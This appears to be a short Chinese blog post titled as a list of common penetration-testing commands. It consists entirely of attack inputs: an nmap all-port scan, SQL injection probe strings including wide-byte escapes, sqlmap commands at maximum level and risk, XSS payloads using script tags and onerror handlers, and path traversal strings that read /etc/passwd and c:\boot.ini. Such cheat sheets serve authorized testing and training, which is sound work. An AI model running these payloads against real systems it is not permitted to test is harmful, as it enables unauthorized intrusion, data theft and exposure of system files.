【工具】渗透常用指令

Nmap

  1. 使用工具Nmap扫描服务器ip,配置选择“Intense scan, all TCP ports”
  2. 扫描目标开启的端口:nmap -sV -p- <目标IP地址>

SQL

  1. 'or'1'='1
  2. 'or'1'='2
  3. '
  4. ''
  5. "
  6. '--
  7. 'or1=1--
  8. 'or'2'>'1
  9. %20AND%201=1
  10. 運'(转义'==\'宽字节注入%df'==%df%5c%27==運'
  11. 1' order by 1 %23
  12. sqlmap.py -u http://xxxx -p 参数--dbs
  13. sqlmap.py -r “D:\..\post.txt” -p 参数--dbs
  14. sqlmap.py -l "D:\..\post.txt" --batch --smart(--level=5 --risk=3)
  15. 伪静态页面在注入参数后加代表注入位置:http://xxxx/2.html
    txt文档也可用*. 如username=admin*&password=admin888 //注入username字段

XSS

  1. <script>alert(1)</script>
  2. "><script>alert(1)</script>
  3. "</script><script>alert(1)</script>
  4. <img src=a onerror=alert(1)>
  5. "><img src=x onerror=confirm(1)><"
  6. <script>prompt(1)</script>
  7. <a href=aaaa.com>1111</a>
  8. \u003cscript\u003ealert\u00281\u0029\u003c\u002fscript\u003e
  9. \u003ca href=aaa.com\u003e111\u003c\u002fa\u003e

任意文件下载

  1. fileName=../../../../../../../../../etc/passwd&path=/etc/passwd
  2. fileName=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
  3. fileName可以是其他参数. tableName. data等Windows: fileName=c:\boot.ini&path=c:\boot.ini

【工具】渗透常用指令
https://eudonomia.eu.org/posts/b41c7870.html
作者
Eschaton
发布于
2024年8月14日
许可协议